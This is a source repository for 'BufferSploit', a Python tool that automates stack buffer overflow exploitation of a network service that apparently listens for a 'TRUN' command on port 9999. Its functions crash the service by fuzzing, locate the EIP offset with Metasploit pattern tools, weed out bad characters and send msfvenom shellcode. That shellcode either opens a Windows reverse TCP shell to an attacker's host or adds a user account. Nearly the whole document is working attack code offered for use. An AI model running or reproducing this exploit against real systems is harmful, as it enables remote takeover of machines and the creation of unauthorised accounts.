├── README.md ├── badchar.txt ├── buffersploit.py └── requirements.txt /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/adithyan-ak/BufferSploit/b6aa96adabb2202bb983ff5ce1db5ceb8b918c73/README.md -------------------------------------------------------------------------------- /badchar.txt: -------------------------------------------------------------------------------- 1 | \x00, 2 | -------------------------------------------------------------------------------- /buffersploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, socket, argparse, subprocess 4 | from binascii import hexlify 5 | from colorama import Fore, Back, Style, init 6 | import codecs 7 | import logging 8 | 9 | #Logs 10 | logging.basicConfig(filename='logs', 11 | level=logging.INFO, 12 | format='%(asctime)s %(message)s', 13 | datefmt='%d/%m/%Y %I:%M:%S %p') 14 | 15 | init(autoreset=True) # Colorama auto reset settings 16 | IP = ('192.168.1.108').encode('latin-1') # Update your Remote IP Address 17 | CRASH = 3000 # Size of the total payload when EXE crashed 18 | PORT = 9999 # Remote Port where the EXE is listening 19 | EBP = 2003 # Total Size of the EBP 20 | EIP = "" # Address of JMP ESP to be replaced in EIP 21 | NOPS = 30 # Size of NOPS 22 | cmd = "TRUN /.:/" # Name oof the Vulnerable variable 23 | 24 | badcharlist = ( 25 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 26 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 27 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 28 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 29 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 30 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 31 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 32 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 33 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 34 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 35 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 36 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 37 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 38 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 39 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 40 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 41 | ) 42 | 43 | def Crash(): 44 | 45 | buffer = [] 46 | 47 | counter = 100 48 | 49 | logging.info('Creating Buffer array with different Buffer size') 50 | while len(buffer) <= 100: 51 | buffer.append('A' * counter) 52 | counter = counter + 100 53 | 54 | for string in buffer: 55 | logging.info("Fuzzing with {} bytes".format(len(string))) 56 | 57 | print(Fore.RED + "Fuzzing with %s bytes"%len(string)) 58 | 59 | try: 60 | logging.info("Trying to connect to {}:{}".format(IP.decode(),PORT)) 61 | 62 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 63 | s.connect((IP, PORT)) 64 | s.send(bytes(cmd + string,"latin-1")) 65 | s.recv(1024) 66 | 67 | except Exception as e: 68 | error = str(e).split("]")[-1].strip() 69 | logging.info("Socker Error : {}".format(error)) 70 | logging.info("Program crashed while sending {} bytes".format(len(string)-100)) 71 | 72 | if len(string)-100 > 0 : 73 | print(Fore.GREEN + "Program crashed while sending %s bytes"% str(len(string)-100)) 74 | else: 75 | print(Fore.RED + "Error : "+ error) 76 | 77 | sys.exit() 78 | s.close() 79 | 80 | def sendPayload(buffer): 81 | try: 82 | logging.info("Sending the Payload") 83 | logging.info("Payload: {}".format(buffer)) 84 | 85 | print(Fore.RED + "Sending Payload ....") 86 | payload = cmd + buffer 87 | 88 | logging.info("Trying to connect to {}:{}".format(IP.decode(),PORT)) 89 | 90 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 91 | s.connect((IP, PORT)) 92 | s.send(bytes(payload,"latin-1")) 93 | s.recv(1024) 94 | print(Fore.GREEN + "Payload Sent!") 95 | s.close() 96 | except socket.error as e: 97 | logging.info("Socker Error : {}".format(str(e).split("]")[-1])) 98 | 99 | except Exception as e: 100 | logging.info("Exception : Service is crashed or not Running") 101 | 102 | print(Fore.GREEN + "Either the service crashed or it's not running") 103 | 104 | def pattern_create(length): 105 | logging.info("Creating a pattern of length : {}".format(length)) 106 | 107 | print("Creating pattern of Length " + str(length)) 108 | pattern = subprocess.run(["msf-pattern_create -l %s"%length], shell=True, stdout=subprocess.PIPE) 109 | pattern = pattern.stdout.decode('latin-1').strip() 110 | 111 | logging.info("Sending the Pattern to Host") 112 | sendPayload(pattern) 113 | 114 | def pattern_offset(offset): 115 | logging.info("Finding the offset address for {}".format(offset)) 116 | 117 | print("Finding the offset address for " + offset) 118 | offset = subprocess.run(["msf-pattern_offset -q %s"%offset], shell=True, stdout=subprocess.PIPE) 119 | 120 | logging.info("Sending the Pattern to Host") 121 | print(offset.stdout.decode('latin-1')) 122 | 123 | def send_badchars(): 124 | logging.info("Sending Badchars") 125 | logging.info("Badchars : {}".format(badcharlist)) 126 | 127 | print("Sending Badchars") 128 | buffer = "\x41" * EBP + "\x42" * 4 + "\x90" * NOPS + badcharlist + "\x43" * ( CRASH - EBP - 4 - NOPS) 129 | sendPayload(str(buffer)) 130 | 131 | def remove_badchars(badchar): 132 | logging.info("Removing the Bad character {} from List".format(badchar)) 133 | 134 | try: 135 | logging.info("Reading the Bad character file") 136 | open('badchar.txt', 'r') 137 | except FileNotFoundError: 138 | logging.info("badchar.txt file not found, Creating a file with Null Byte") 139 | 140 | with open('badchar.txt', 'w') as f: 141 | f.write(r"\x00,") 142 | f.close() 143 | 144 | import itertools 145 | logging.info("Converting Bad character to list") 146 | new_badchar = [i for i in badcharlist] 147 | 148 | logging.info("Generating all 256 Character in Hexvalues") 149 | hex_digits = ["".join(i) for i in itertools.product("0123456789ABCDEF",repeat=2)][1:] 150 | 151 | Flag = False 152 | logging.info("Reading badcharacters from file") 153 | with open('badchar.txt', 'r') as f: 154 | b = f.read().strip() 155 | f.close() 156 | 157 | logging.info("Spliting the Badchar with Comma Delimiter") 158 | for i in b.split(','): 159 | if i == badchar: 160 | Flag = True 161 | 162 | try: 163 | logging.info("Find the index of Badchar") 164 | index = hex_digits.index(str(i[-2:]).upper()) 165 | 166 | logging.info("Remove the Bad character") 167 | new_badchar.remove(new_badchar[index]) 168 | hex_digits.remove(hex_digits[index]) 169 | except Exception as e: 170 | logging.info("Exception : {}".format(e)) 171 | 172 | if not Flag: 173 | logging.info("Removing {} bad character".format(badchar)) 174 | 175 | index = hex_digits.index(badchar[-2:].upper()) 176 | new_badchar.remove(new_badchar[index]) 177 | hex_digits.remove(hex_digits[index]) 178 | 179 | 180 | with open('badchar.txt', 'w') as f: 181 | logging.info("Appending the new Bad character") 182 | if badchar not in b.split(','): 183 | b += "x"+badchar + ',' 184 | f.write(b) 185 | f.close() 186 | 187 | buffer = "\x41" * EBP + "\x42" * 4 + "\x90" * NOPS + "".join(new_badchar) + "\x43" * ( CRASH - EBP - 4 - NOPS) 188 | 189 | sendPayload(buffer) 190 | 191 | def shellcode(LHOST=None,LPORT=None): 192 | 193 | if EIP == "": 194 | logging.info("EIP location is empty.\n Set EIP Location") 195 | 196 | print("Please set the EIP Location.") 197 | print(Fore.RED + "Exiting...") 198 | sys.exit() 199 | 200 | modules = { 201 | 1:'Windows Reverse Shell TCP', 202 | 2:'Windows User Add' 203 | } 204 | for key,value in modules.items(): 205 | print(str(key)+" : "+value) 206 | 207 | choice = int(input(">> ")) 208 | 209 | logging.info("Executing {}".format(modules[choice])) 210 | print(Fore.GREEN+"Executing {}".format(modules[choice])) 211 | 212 | if choice == 1: 213 | if LHOST == None or LPORT == None: 214 | LHOST = input("Enter LHOST IP Address : ") 215 | LPORT = input("Enter LPORT Number : ") 216 | print("Generating shellcode") 217 | logging.info("Generating shellcode with LHOST={} LPORT={}".format(LHOST,LPORT)) 218 | 219 | with open('badchar.txt', 'r') as f: 220 | bd = f.read() 221 | bd = bd.replace(",","\\") 222 | bd = bd[:-1] 223 | 224 | shellcode = subprocess.run(["msfvenom -p windows/shell_reverse_tcp LHOST={} LPORT={} -b '{}' -f c EXITFUNC=thread --platform windows".format(LHOST,LPORT,bd) ], shell=True, stdout=subprocess.PIPE) 225 | shellcode = shellcode.stdout.decode('latin-1') 226 | shellcode = shellcode.split("\n",1)[1] 227 | shellcode = "".join([i[1:-1] for i in shellcode[:-2].split("\n")]).replace(r"\\x",r"\x") 228 | shellcode=codecs.decode(shellcode, 'unicode_escape') 229 | buffer = "\x41" * EBP + EIP + "\x90" * NOPS + str(shellcode) + "\x43" * ( CRASH - EBP - 4 - NOPS) 230 | 231 | logging.info("Shellcode: {}".format(shellcode)) 232 | sendPayload(buffer) 233 | 234 | if choice == 2: 235 | # msfvenom -p windows/adduser -b "\x00\x04\xa4\xba\xef" -e x86/fnstenv_mov -f c 236 | with open('badchar.txt', 'r') as f: 237 | bd = f.read() 238 | bd = bd.replace(",","\\") 239 | 240 | logging.info("Generating Code for Adding User") 241 | command = "msfvenom -p windows/adduser -b '%s' -e x86/fnstenv_mov -f c" % bd[:-1] 242 | shellcode = subprocess.run([command], shell=True, stdout=subprocess.PIPE) 243 | shellcode = shellcode.stdout.decode('latin-1') 244 | shellcode = shellcode.split("\n",1)[1] 245 | shellcode = "".join([i[1:-1] for i in shellcode[:-2].split("\n")]).replace(r"\\x",r"\x") 246 | shellcode=codecs.decode(shellcode, 'unicode_escape') 247 | 248 | logging.info("Shellcode: {}".format(shellcode)) 249 | buffer = "\x41" * EBP + EIP + "\x90" * NOPS + shellcode + "\x43" * ( CRASH - EBP - 4 - NOPS) 250 | sendPayload(buffer) 251 | 252 | if __name__ == '__main__': 253 | logging.info('Starting Buffersploit') 254 | print(Fore.CYAN+''' 255 | 256 | ██████╗ ██╗ ██╗███████╗███████╗███████╗██████╗ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗ 257 | ██╔══██╗██║ ██║██╔════╝██╔════╝██╔════╝██╔══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ 258 | ██████╔╝██║ ██║█████╗ █████╗ █████╗ ██████╔╝███████╗██████╔╝██║ ██║ ██║██║ ██║ 259 | ██╔══██╗██║ ██║██╔══╝ ██╔══╝ ██╔══╝ ██╔══██╗╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║ 260 | ██████╔╝╚██████╔╝██║ ██║ ███████╗██║ ██║███████║██║ ███████╗╚██████╔╝██║ ██║ 261 | ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ 262 | 263 | ''') 264 | 265 | parser = argparse.ArgumentParser() 266 | parser.add_argument('-c', help='Crash bytes size', action='store_true') 267 | parser.add_argument('-l', help='Length for sending a random pattern') 268 | parser.add_argument('-q', help='Query to find the offset address') 269 | parser.add_argument('-b', help='Send Badchars to the target', action='store_true') 270 | parser.add_argument('-br', help='Specify the found badcharacter') 271 | parser.add_argument('-s', help='Generate Shellcode',action='store_true') 272 | parser.add_argument('--L', help='Local address for reverse shell') 273 | parser.add_argument('--P', help='Local Port for reverse shell') 274 | 275 | args = parser.parse_args() 276 | 277 | if args.c: 278 | logging.info('Performing Crash Operation') 279 | Crash() 280 | 281 | if args.l : 282 | logging.info('Performing Random Pattern Generation Operation') 283 | if int(args.l)!= CRASH: 284 | logging.info("Crash not equal to Patten length") 285 | print("Crash value should be equal to {}".format(args.l)) 286 | logging.info("Exiting...") 287 | exit() 288 | 289 | pattern_create(args.l) 290 | 291 | if args.q : 292 | logging.info('Performing Operation to find Offset') 293 | pattern_offset(args.q) 294 | 295 | if args.b : 296 | logging.info('Performing Operation to check Badchar') 297 | send_badchars() 298 | 299 | if args.br : 300 | logging.info('Performing Operation to append new Badchar') 301 | remove_badchars(args.br) 302 | 303 | if args.s: 304 | logging.info('Performing Shellcode Operation') 305 | shellcode(args.L,args.P) 306 | 307 | logging.info("Exiting...") 308 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | argparse 2 | pycopy-binascii 3 | colorama --------------------------------------------------------------------------------